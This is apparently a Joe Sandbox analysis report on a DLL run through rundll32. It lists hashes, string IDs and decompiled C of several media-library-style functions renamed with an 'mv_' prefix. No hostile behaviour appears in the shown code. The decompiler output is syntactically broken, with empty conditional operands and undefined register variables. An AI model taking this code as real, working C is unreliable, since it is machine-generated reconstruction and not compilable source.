                                                                      • String ID: The value set by option '%s' is not a video rate.$Value %f for parameter '%s' is not a valid set of 32bit integer flags$Value %f for parameter '%s' out of range [%g - %g]
                                                                      • API String ID: 3828882664-184275398
                                                                      • Opcode ID: 9048f1d3171aae043673fb0fdbe3cfab101bd8445a56e714e4be4b6e8c8ac588
                                                                      • Instruction ID: d45a10e71e14beca1d3a191c2c2f45444891420c3d6d5d391c48b5bc7296f499
                                                                      • Opcode Fuzzy Hash: 9048f1d3171aae043673fb0fdbe3cfab101bd8445a56e714e4be4b6e8c8ac588
                                                                      • Instruction Fuzzy Hash: A281A135908B458FC341EF29E48011BFBE5FFD62E0FA0975AF89A6B260D7319881C742
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 800b1406a6777d3b0a110f8a2bafff3ed093b576a6716a7b0ba2b2e8c81d1b2c
                                                                      • Instruction ID: 3912d89886b32ab3c0e056b5cdab389be67126b87d12ef53d502f4ae6e2b42f2
                                                                      • Opcode Fuzzy Hash: 800b1406a6777d3b0a110f8a2bafff3ed093b576a6716a7b0ba2b2e8c81d1b2c
                                                                      • Instruction Fuzzy Hash: 057157B560A7028FC756CF28C0A062BB7E1EF94681F21892DF8D58F255D731ED45CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_pix_fmt_desc_get.F086 ref: 1002319F
                                                                      • mv_image_get_linesize.F086 ref: 100231D4
                                                                        • Part of subcall function 10021480: mv_pix_fmt_desc_get.F086(?,?,?,?,?,?,?,?,?,?,00000000,?,100B6C20,00000000,10022208), ref: 10021496
                                                                      • mv_image_fill_linesizes.F086(?), ref: 10023268
                                                                      • mv_image_fill_plane_sizes.F086(?), ref: 100232CB
                                                                      Strings
                                                                      • Picture size %ux%u is invalid, xrefs: 1002331F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_pix_fmt_desc_get$mv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_get_linesize
                                                                      • String ID: Picture size %ux%u is invalid
                                                                      • API String ID: 3680373976-1963597007
                                                                      • Opcode ID: 07e5c2be4807f6978617a4492a07696999ca7ae4d9d795ec3814173b8ca04270
                                                                      • Instruction ID: 42873512ec11e61a891db32c639e21bb7bc2094a7c171237446aa949f8b4b16f
                                                                      • Opcode Fuzzy Hash: 07e5c2be4807f6978617a4492a07696999ca7ae4d9d795ec3814173b8ca04270
                                                                      • Instruction Fuzzy Hash: 80513576A083418BC384CF69D88064EBBE2EFC8750F55CA3EE598C7350EA75DA448B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 26%
                                                                      			E100121A0(intOrPtr* _a4, signed int* _a8, char _a12, char _a16) {
                                                                      				char _v1052;
                                                                      				char _v1053;
                                                                      				char _v1054;
                                                                      				char _v1055;
                                                                      				char _v1072;
                                                                      				char _v1076;
                                                                      				intOrPtr _v1100;
                                                                      				intOrPtr _v1104;
                                                                      				intOrPtr _v1108;
                                                                      				signed int* _v1112;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				char _t41;
                                                                      				signed int _t43;
                                                                      				signed int _t47;
                                                                      				void* _t62;
                                                                      				char* _t63;
                                                                      				intOrPtr* _t65;
                                                                      				char _t67;
                                                                      				signed int* _t71;
                                                                      				void* _t72;
                                                                      				intOrPtr* _t74;
                                                                      				void* _t77;
                                                                      				char* _t78;
                                                                      				intOrPtr* _t79;
                                                                      
                                                                      				_t79 =  &_v1100;
                                                                      				_t71 = _a8;
                                                                      				_t41 = _a12;
                                                                      				_v1053 = 0;
                                                                      				_t67 = _a16;
                                                                      				_t74 = _a4;
                                                                      				_v1072 = _t41;
                                                                      				_v1076 = _t67;
                                                                      				_v1055 = _t67;
                                                                      				_v1054 = _t41;
                                                                      				if(_t71 == 0 || _t67 == 0 || _t41 == 0 || _t67 == _t41 || _t67 == 0x5c || _t41 == 0x5c) {
                                                                      					return 0xffffffea;
                                                                      				}
                                                                      				if(_t74 == 0 ||  *_t74 == 0) {
                                                                      					 *_t79 = 0x100b4205;
                                                                      					_t43 = E100292E0(_t62, _t71, _t74, _t77);
                                                                      					 *_t71 = _t43;
                                                                      					asm("sbb eax, eax");
                                                                      					return _t43 & 0xfffffff4;
                                                                      				}
                                                                      				_v1108 = 0xffffffff;
                                                                      				_t63 =  &_v1052;
                                                                      				_v1112 = 0x40;
                                                                      				_t78 =  &_v1055;
                                                                      				 *_t79 = _t63;
                                                                      				L10008880(_t63, _t71, _t74, _t78);
                                                                      				_t47 = 0;
                                                                      				_t65 = _t74;
                                                                      				_a8 = _t71;
                                                                      				_t72 = 0;
                                                                      				if( *_t65 > 0) {
                                                                      					while(1) {
                                                                      						_t74 =  *((intOrPtr*)(_t65 + 4)) + _t47 * 8;
                                                                      						if(_t74 == 0) {
                                                                      							goto L14;
                                                                      						}
                                                                      						if(_t72 != 0) {
                                                                      							 *_t79 = _t63;
                                                                      							_v1108 = 1;
                                                                      							_v1112 =  &_v1076;
                                                                      							_a4 = _t65;
                                                                      							L10008F30();
                                                                      							_t65 = _a4;
                                                                      						}
                                                                      						_v1108 = _t78;
                                                                      						_v1104 = 1;
                                                                      						_t72 = _t72 + 1;
                                                                      						_v1100 = 0;
                                                                      						_a4 = _t65;
                                                                      						 *_t79 = _t63;
                                                                      						_v1112 =  *_t74;
                                                                      						L10009730();
                                                                      						_v1108 = 1;
                                                                      						_v1112 =  &_v1072;
                                                                      						 *_t79 = _t63;
                                                                      						L10008F30();
                                                                      						_v1100 = 0;
                                                                      						_v1104 = 1;
                                                                      						_v1108 = _t78;
                                                                      						 *_t79 = _t63;
                                                                      						_v1112 =  *((intOrPtr*)(_t74 + 4));
                                                                      						L10009730();
                                                                      						_t65 = _a4;
                                                                      						_t47 = _t74 + 1;
                                                                      						if( *_t65 > _t47) {
                                                                      							continue;
                                                                      						}
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      				L14:
                                                                      				 *_t79 = _t63;
                                                                      				_v1112 = _a8;
                                                                      				return E10009690(_t63, _t65, _a8, _t74);
                                                                      			}

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprint_escape$mv_bprint_append_datamv_bprint_finalizemv_bprint_initmv_strdup
                                                                      • String ID:
                                                                      • API String ID: 806756221-0
                                                                      • Opcode ID: 55f0c84e98da42de065d76c2acb9437629b6bfeb986306e9a32b1f14191fa22a
                                                                      • Instruction ID: 1123dba4393114ef0ad0658bdbc6ab6a3ceb4212d851131ba1441c628290b326
                                                                      • Opcode Fuzzy Hash: 55f0c84e98da42de065d76c2acb9437629b6bfeb986306e9a32b1f14191fa22a
                                                                      • Instruction Fuzzy Hash: 8C4114B55093449BC360CF28C08025ABBE5FF85394F55892EE9988B341E636EA95CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_expr_parse_and_eval.F086 ref: 1002F115
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_expr_parse_and_eval
                                                                      • String ID: all$default$max$min$none
                                                                      • API String ID: 2217327432-3292705889
                                                                      • Opcode ID: 10902ce6959dcda57c3802d1404c17b7355792d975e56109f361b0065da62f55
                                                                      • Instruction ID: 98b80aec2e3a380831a781cac75c10b25bfbbdd989e4a5369e61f7fda47c1b04
                                                                      • Opcode Fuzzy Hash: 10902ce6959dcda57c3802d1404c17b7355792d975e56109f361b0065da62f55
                                                                      • Instruction Fuzzy Hash: CC41F3B5A097418BC391EF28E04039BBBE5FFC9354F618A2EE5C9C7200EB71D9459B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$_sopenrandstrlen
                                                                      • String ID: XXXX
                                                                      • API String ID: 1081397658-1518373315
                                                                      • Opcode ID: 82e0733fef7f5bb36d99413f1072fc2f656cde989d35784bfb4da4dbfebec7eb
                                                                      • Instruction ID: 5ba2c4e2c30cf57021d4c67dc99ab4cf3299af9f9df0caf2ec803c7fcbdd4207
                                                                      • Opcode Fuzzy Hash: 82e0733fef7f5bb36d99413f1072fc2f656cde989d35784bfb4da4dbfebec7eb
                                                                      • Instruction Fuzzy Hash: A62137B190934A9FC704EF24889015E7BE4EF86394F11C92DF4998B291D6399A49DB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 16%
                                                                      			E1000C220() {
                                                                      				char* _t55;
                                                                      				void* _t57;
                                                                      				void* _t59;
                                                                      				void* _t63;
                                                                      				unsigned int _t64;
                                                                      				signed char _t66;
                                                                      				void* _t67;
                                                                      				unsigned int _t72;
                                                                      				unsigned int _t73;
                                                                      				void* _t75;
                                                                      				intOrPtr _t77;
                                                                      				void* _t81;
                                                                      				int _t82;
                                                                      				signed int _t83;
                                                                      				intOrPtr _t88;
                                                                      				void* _t92;
                                                                      				int _t95;
                                                                      				signed int _t96;
                                                                      				void* _t103;
                                                                      				void* _t104;
                                                                      				void* _t107;
                                                                      				void* _t113;
                                                                      				void* _t116;
                                                                      				void** _t119;
                                                                      				void* _t122;
                                                                      				intOrPtr* _t123;
                                                                      				void** _t125;
                                                                      
                                                                      				_t123 = _t122 - 0x1c;
                                                                      				_t77 =  *((intOrPtr*)(_t123 + 0x20));
                                                                      				_t88 =  *((intOrPtr*)(_t123 + 0x24)) - 0x400;
                                                                      				if(_t88 <= 0x3ff) {
                                                                      					 *((intOrPtr*)(_t123 + 8)) = _t88;
                                                                      					_t55 = "AMBI%d";
                                                                      					 *(_t123 + 4) = _t55;
                                                                      					 *_t123 = _t77;
                                                                      					L1();
                                                                      					return _t55;
                                                                      				} else {
                                                                      					if(__eax <= 0x28) {
                                                                      						__edx =  *(0x100b2280 + __eax * 8);
                                                                      						if(__edx == 0) {
                                                                      							goto L34;
                                                                      						} else {
                                                                      							 *(__esp + 8) = __edx;
                                                                      							__eax = "%s";
                                                                      							 *(__esp + 4) = __eax;
                                                                      							 *__esp = __ecx;
                                                                      							L1();
                                                                      							__esp = __esp + 0x1c;
                                                                      							return __eax;
                                                                      						}
                                                                      					} else {
                                                                      						if(__eax != 0xffffffff) {
                                                                      							L34:
                                                                      							 *(__esp + 8) = __eax;
                                                                      							__eax = "USR%d";
                                                                      							 *(__esp + 4) = __eax;
                                                                      							 *__esp = __ecx;
                                                                      							L1();
                                                                      							__esp = __esp + 0x1c;
                                                                      							return __eax;
                                                                      						} else {
                                                                      							 *((intOrPtr*)(__esp + 0x20)) = __ecx;
                                                                      							__edx = "NONE";
                                                                      							 *(__esp + 0x24) = "NONE";
                                                                      							__esp = __esp + 0x1c;
                                                                      							_t125 = _t123 - 0x2c;
                                                                      							_t119 = _t125[0x10];
                                                                      							_t72 = _t119[2];
                                                                      							_t125[6] =  &(_t119[4]);
                                                                      							while(1) {
                                                                      								_t57 = _t119[1];
                                                                      								_t90 =  <=  ? _t57 : _t72;
                                                                      								_t73 = _t72 - ( <=  ? _t57 : _t72);
                                                                      								if(_t73 != 0) {
                                                                      									goto L2;
                                                                      								}
                                                                      								 *_t125 = 0;
                                                                      								_t125[3] =  &(_t125[0x12]);
                                                                      								_t125[2] = _t125[0x11];
                                                                      								_t125[1] = 0;
                                                                      								_t59 = L10096020();
                                                                      								_t113 = _t59;
                                                                      								if(_t59 > 0) {
                                                                      									L4:
                                                                      									_t92 = _t119[2];
                                                                      									_t64 = _t119[3];
                                                                      									_t75 = _t119[1];
                                                                      									if(_t92 == _t64 || _t75 >= _t92) {
                                                                      										L25:
                                                                      										_t62 =  >  ? _t113 : 0xfffffffa - _t75;
                                                                      										_t59 = ( >  ? _t113 : 0xfffffffa - _t75) + _t75;
                                                                      										_t119[1] = 0xfffffffa;
                                                                      										if(_t92 == 0) {
                                                                      											goto L16;
                                                                      										} else {
                                                                      											_t94 =  >  ? _t59 : _t92 - 1;
                                                                      											_t63 =  *_t119;
                                                                      											 *((char*)(_t63 + ( >  ? _t59 : _t92 - 1))) = 0;
                                                                      											return _t63;
                                                                      										}
                                                                      									} else {
                                                                      										_t80 =  >  ? _t113 : 0xfffffffe - _t75;
                                                                      										_t81 = _t75 + ( >  ? _t113 : 0xfffffffe - _t75) + 1;
                                                                      										_t72 = _t64;
                                                                      										if(_t64 >> 1 >= _t92) {
                                                                      											_t72 = _t92 + _t92;
                                                                      										}
                                                                      										if(_t72 < _t81) {
                                                                      											_t87 =  <=  ? _t64 : _t81;
                                                                      											_t72 =  <=  ? _t64 : _t81;
                                                                      										}
                                                                      										_t103 =  *_t119;
                                                                      										_t125[1] = _t72;
                                                                      										if(_t103 == _t125[6]) {
                                                                      											 *_t125 = 0;
                                                                      											_t66 = L10028DA0();
                                                                      											if(_t66 == 0) {
                                                                      												goto L24;
                                                                      											} else {
                                                                      												goto L18;
                                                                      											}
                                                                      										} else {
                                                                      											 *_t125 = _t103;
                                                                      											_t66 = L10028DA0();
                                                                      											if(_t66 == 0) {
                                                                      												L24:
                                                                      												_t75 = _t119[1];
                                                                      												_t92 = _t119[2];
                                                                      												goto L25;
                                                                      											} else {
                                                                      												if(_t103 == 0) {
                                                                      													L18:
                                                                      													_t95 = _t119[1];
                                                                      													_t104 = _t66;
                                                                      													_t116 =  *_t119;
                                                                      													_t82 = _t95 + 1;
                                                                      													_t125[7] = _t116;
                                                                      													if(_t82 >= 8) {
                                                                      														if((_t66 & 0x00000001) != 0) {
                                                                      															_t83 =  *_t116 & 0x000000ff;
                                                                      															_t104 = _t66 + 1;
                                                                      															_t116 = _t116 + 1;
                                                                      															 *_t66 = _t83;
                                                                      															_t82 = _t95;
                                                                      														}
                                                                      														if((_t104 & 0x00000002) != 0) {
                                                                      															_t96 =  *_t116 & 0x0000ffff;
                                                                      															_t104 = _t104 + 2;
                                                                      															_t116 = _t116 + 2;
                                                                      															_t82 = _t82 - 2;
                                                                      															 *(_t104 - 2) = _t96;
                                                                      														}
                                                                      														if((_t104 & 0x00000004) == 0) {
                                                                      															goto L19;
                                                                      														} else {
                                                                      															_t107 = _t104 + 4;
                                                                      															 *(_t107 - 4) =  *_t116;
                                                                      															_t67 = memcpy(_t107, _t116 + 4, _t82 - 4);
                                                                      															_t125 =  &(_t125[3]);
                                                                      															goto L13;
                                                                      														}
                                                                      													} else {
                                                                      														L19:
                                                                      														_t67 = memcpy(_t104, _t116, _t82);
                                                                      														_t125 =  &(_t125[3]);
                                                                      														goto L13;
                                                                      													}
                                                                      													goto L36;
                                                                      												}
                                                                      												L13:
                                                                      												 *_t119 = _t67;
                                                                      												_t119[2] = _t72;
                                                                      												continue;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									L16:
                                                                      									return _t59;
                                                                      								}
                                                                      								goto L36;
                                                                      								L2:
                                                                      								_t125[3] =  &(_t125[0x12]);
                                                                      								_t125[1] = _t73;
                                                                      								_t125[2] = _t125[0x11];
                                                                      								 *_t125 = _t57 +  *_t119;
                                                                      								_t59 = L10096020();
                                                                      								_t113 = _t59;
                                                                      								if(_t59 <= 0) {
                                                                      									goto L16;
                                                                      								} else {
                                                                      									if(_t59 < _t73) {
                                                                      										goto L24;
                                                                      									} else {
                                                                      										goto L4;
                                                                      									}
                                                                      								}
                                                                      								goto L36;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L36:
                                                                      			}






























                                                                      0x100089e0
                                                                      0x100089e7
                                                                      0x100089ef
                                                                      0x100089f5
                                                                      0x100089f9
                                                                      0x100089fc
                                                                      0x10008a03
                                                                      0x10008a05
                                                                      0x00000000
                                                                      0x10008a0b
                                                                      0x10008a0d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10008a0d
                                                                      0x00000000
                                                                      0x10008a05
                                                                      0x10008a7d
                                                                      0x1000c241
                                                                      0x1000c23c
                                                                      0x00000000

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprintf
                                                                      • String ID: AMBI%d$NONE$USR%d
                                                                      • API String ID: 3083893021-3656852315
                                                                      • Opcode ID: 79c1b8cc5645a9667c6a0867682904637ac744c720650d4db15b242002d3a8e6
                                                                      • Instruction ID: 215f8c01a0ebe083e3755320398acc4362dbfeb093f1504df316b337c640c054
                                                                      • Opcode Fuzzy Hash: 79c1b8cc5645a9667c6a0867682904637ac744c720650d4db15b242002d3a8e6
                                                                      • Instruction Fuzzy Hash: 16012CB8909B418BD304EF28848052EBAE1FF84284FD48A6DE4CC87755E639DA409B83
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 16%
                                                                      			E1000C3C0() {
                                                                      				char* _t55;
                                                                      				void* _t57;
                                                                      				void* _t59;
                                                                      				void* _t63;
                                                                      				unsigned int _t64;
                                                                      				signed char _t66;
                                                                      				void* _t67;
                                                                      				unsigned int _t72;
                                                                      				unsigned int _t73;
                                                                      				void* _t75;
                                                                      				intOrPtr _t77;
                                                                      				void* _t81;
                                                                      				int _t82;
                                                                      				signed int _t83;
                                                                      				intOrPtr _t88;
                                                                      				void* _t92;
                                                                      				int _t95;
                                                                      				signed int _t96;
                                                                      				void* _t103;
                                                                      				void* _t104;
                                                                      				void* _t107;
                                                                      				void* _t113;
                                                                      				void* _t116;
                                                                      				void** _t119;
                                                                      				void* _t122;
                                                                      				intOrPtr* _t123;
                                                                      				void** _t125;
                                                                      
                                                                      				_t123 = _t122 - 0x1c;
                                                                      				_t77 =  *((intOrPtr*)(_t123 + 0x20));
                                                                      				_t88 =  *((intOrPtr*)(_t123 + 0x24)) - 0x400;
                                                                      				if(_t88 <= 0x3ff) {
                                                                      					 *((intOrPtr*)(_t123 + 8)) = _t88;
                                                                      					_t55 = "ambisonic ACN %d";
                                                                      					 *(_t123 + 4) = _t55;
                                                                      					 *_t123 = _t77;
                                                                      					L1();
                                                                      					return _t55;
                                                                      				} else {
                                                                      					if(__eax <= 0x28) {
                                                                      						__edx =  *(0x100b2284 + __eax * 8);
                                                                      						if(__edx == 0) {
                                                                      							goto L34;
                                                                      						} else {
                                                                      							 *(__esp + 8) = __edx;
                                                                      							__eax = "%s";
                                                                      							 *(__esp + 4) = __eax;
                                                                      							 *__esp = __ecx;
                                                                      							L1();
                                                                      							__esp = __esp + 0x1c;
                                                                      							return __eax;
                                                                      						}
                                                                      					} else {
                                                                      						if(__eax != 0xffffffff) {
                                                                      							L34:
                                                                      							 *(__esp + 8) = __eax;
                                                                      							__eax = "user %d";
                                                                      							 *(__esp + 4) = __eax;
                                                                      							 *__esp = __ecx;
                                                                      							L1();
                                                                      							__esp = __esp + 0x1c;
                                                                      							return __eax;
                                                                      						} else {
                                                                      							 *((intOrPtr*)(__esp + 0x20)) = __ecx;
                                                                      							__edx = "none";
                                                                      							 *(__esp + 0x24) = "none";
                                                                      							__esp = __esp + 0x1c;
                                                                      							_t125 = _t123 - 0x2c;
                                                                      							_t119 = _t125[0x10];
                                                                      							_t72 = _t119[2];
                                                                      							_t125[6] =  &(_t119[4]);
                                                                      							while(1) {
                                                                      								_t57 = _t119[1];
                                                                      								_t90 =  <=  ? _t57 : _t72;
                                                                      								_t73 = _t72 - ( <=  ? _t57 : _t72);
                                                                      								if(_t73 != 0) {
                                                                      									goto L2;
                                                                      								}
                                                                      								 *_t125 = 0;
                                                                      								_t125[3] =  &(_t125[0x12]);
                                                                      								_t125[2] = _t125[0x11];
                                                                      								_t125[1] = 0;
                                                                      								_t59 = L10096020();
                                                                      								_t113 = _t59;
                                                                      								if(_t59 > 0) {
                                                                      									L4:
                                                                      									_t92 = _t119[2];
                                                                      									_t64 = _t119[3];
                                                                      									_t75 = _t119[1];
                                                                      									if(_t92 == _t64 || _t75 >= _t92) {
                                                                      										L25:
                                                                      										_t62 =  >  ? _t113 : 0xfffffffa - _t75;
                                                                      										_t59 = ( >  ? _t113 : 0xfffffffa - _t75) + _t75;
                                                                      										_t119[1] = 0xfffffffa;
                                                                      										if(_t92 == 0) {
                                                                      											goto L16;
                                                                      										} else {
                                                                      											_t94 =  >  ? _t59 : _t92 - 1;
                                                                      											_t63 =  *_t119;
                                                                      											 *((char*)(_t63 + ( >  ? _t59 : _t92 - 1))) = 0;
                                                                      											return _t63;
                                                                      										}
                                                                      									} else {
                                                                      										_t80 =  >  ? _t113 : 0xfffffffe - _t75;
                                                                      										_t81 = _t75 + ( >  ? _t113 : 0xfffffffe - _t75) + 1;
                                                                      										_t72 = _t64;
                                                                      										if(_t64 >> 1 >= _t92) {
                                                                      											_t72 = _t92 + _t92;
                                                                      										}
                                                                      										if(_t72 < _t81) {
                                                                      											_t87 =  <=  ? _t64 : _t81;
                                                                      											_t72 =  <=  ? _t64 : _t81;
                                                                      										}
                                                                      										_t103 =  *_t119;
                                                                      										_t125[1] = _t72;
                                                                      										if(_t103 == _t125[6]) {
                                                                      											 *_t125 = 0;
                                                                      											_t66 = L10028DA0();
                                                                      											if(_t66 == 0) {
                                                                      												goto L24;
                                                                      											} else {
                                                                      												goto L18;
                                                                      											}
                                                                      										} else {
                                                                      											 *_t125 = _t103;
                                                                      											_t66 = L10028DA0();
                                                                      											if(_t66 == 0) {
                                                                      												L24:
                                                                      												_t75 = _t119[1];
                                                                      												_t92 = _t119[2];
                                                                      												goto L25;
                                                                      											} else {
                                                                      												if(_t103 == 0) {
                                                                      													L18:
                                                                      													_t95 = _t119[1];
                                                                      													_t104 = _t66;
                                                                      													_t116 =  *_t119;
                                                                      													_t82 = _t95 + 1;
                                                                      													_t125[7] = _t116;
                                                                      													if(_t82 >= 8) {
                                                                      														if((_t66 & 0x00000001) != 0) {
                                                                      															_t83 =  *_t116 & 0x000000ff;
                                                                      															_t104 = _t66 + 1;
                                                                      															_t116 = _t116 + 1;
                                                                      															 *_t66 = _t83;
                                                                      															_t82 = _t95;
                                                                      														}
                                                                      														if((_t104 & 0x00000002) != 0) {
                                                                      															_t96 =  *_t116 & 0x0000ffff;
                                                                      															_t104 = _t104 + 2;
                                                                      															_t116 = _t116 + 2;
                                                                      															_t82 = _t82 - 2;
                                                                      															 *(_t104 - 2) = _t96;
                                                                      														}
                                                                      														if((_t104 & 0x00000004) == 0) {
                                                                      															goto L19;
                                                                      														} else {
                                                                      															_t107 = _t104 + 4;
                                                                      															 *(_t107 - 4) =  *_t116;
                                                                      															_t67 = memcpy(_t107, _t116 + 4, _t82 - 4);
                                                                      															_t125 =  &(_t125[3]);
                                                                      															goto L13;
                                                                      														}
                                                                      													} else {
                                                                      														L19:
                                                                      														_t67 = memcpy(_t104, _t116, _t82);
                                                                      														_t125 =  &(_t125[3]);
                                                                      														goto L13;
                                                                      													}
                                                                      													goto L36;
                                                                      												}
                                                                      												L13:
                                                                      												 *_t119 = _t67;
                                                                      												_t119[2] = _t72;
                                                                      												continue;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									L16:
                                                                      									return _t59;
                                                                      								}
                                                                      								goto L36;
                                                                      								L2:
                                                                      								_t125[3] =  &(_t125[0x12]);
                                                                      								_t125[1] = _t73;
                                                                      								_t125[2] = _t125[0x11];
                                                                      								 *_t125 = _t57 +  *_t119;
                                                                      								_t59 = L10096020();
                                                                      								_t113 = _t59;
                                                                      								if(_t59 <= 0) {
                                                                      									goto L16;
                                                                      								} else {
                                                                      									if(_t59 < _t73) {
                                                                      										goto L24;
                                                                      									} else {
                                                                      										goto L4;
                                                                      									}
                                                                      								}
                                                                      								goto L36;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L36:
                                                                      			}
                                                                      0x10008acf
                                                                      0x10008ad6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10008a63
                                                                      0x10008a63
                                                                      0x10008a66
                                                                      0x10008a6d
                                                                      0x10008b20
                                                                      0x10008b20
                                                                      0x10008b23
                                                                      0x00000000
                                                                      0x10008a73
                                                                      0x10008a75
                                                                      0x10008ad8
                                                                      0x10008ad8
                                                                      0x10008adb
                                                                      0x10008add
                                                                      0x10008ae0
                                                                      0x10008ae3
                                                                      0x10008aea
                                                                      0x10008af2
                                                                      0x10008b50
                                                                      0x10008b53
                                                                      0x10008b56
                                                                      0x10008b57
                                                                      0x10008b59
                                                                      0x10008b59
                                                                      0x10008afa
                                                                      0x10008b5d
                                                                      0x10008b60
                                                                      0x10008b63
                                                                      0x10008b66
                                                                      0x10008b69
                                                                      0x10008b69
                                                                      0x10008b02
                                                                      0x00000000
                                                                      0x10008b04
                                                                      0x10008b06
                                                                      0x10008b0f
                                                                      0x10008b12
                                                                      0x10008b12
                                                                      0x00000000
                                                                      0x10008b12
                                                                      0x10008aec
                                                                      0x10008aec
                                                                      0x10008aec
                                                                      0x10008aec
                                                                      0x00000000
                                                                      0x10008aec
                                                                      0x00000000
                                                                      0x10008aea
                                                                      0x10008a77
                                                                      0x10008a77
                                                                      0x10008a7a
                                                                      0x00000000
                                                                      0x10008a7a
                                                                      0x10008a6d
                                                                      0x10008a61
                                                                      0x10008abb
                                                                      0x10008abb
                                                                      0x10008ac2
                                                                      0x10008ac2
                                                                      0x00000000
                                                                      0x100089e0
                                                                      0x100089e7
                                                                      0x100089ef
                                                                      0x100089f5
                                                                      0x100089f9
                                                                      0x100089fc
                                                                      0x10008a03
                                                                      0x10008a05
                                                                      0x00000000
                                                                      0x10008a0b
                                                                      0x10008a0d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10008a0d
                                                                      0x00000000
                                                                      0x10008a05
                                                                      0x10008a7d
                                                                      0x1000c3e1
                                                                      0x1000c3dc
                                                                      0x00000000

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprintf
                                                                      • String ID: ambisonic ACN %d$none$user %d
                                                                      • API String ID: 3083893021-4180635230
                                                                      • Opcode ID: 9c8de8448e6615b8fa7c2115a21e64c0d84a2e4daa03812f1183ed2e3bd7c657
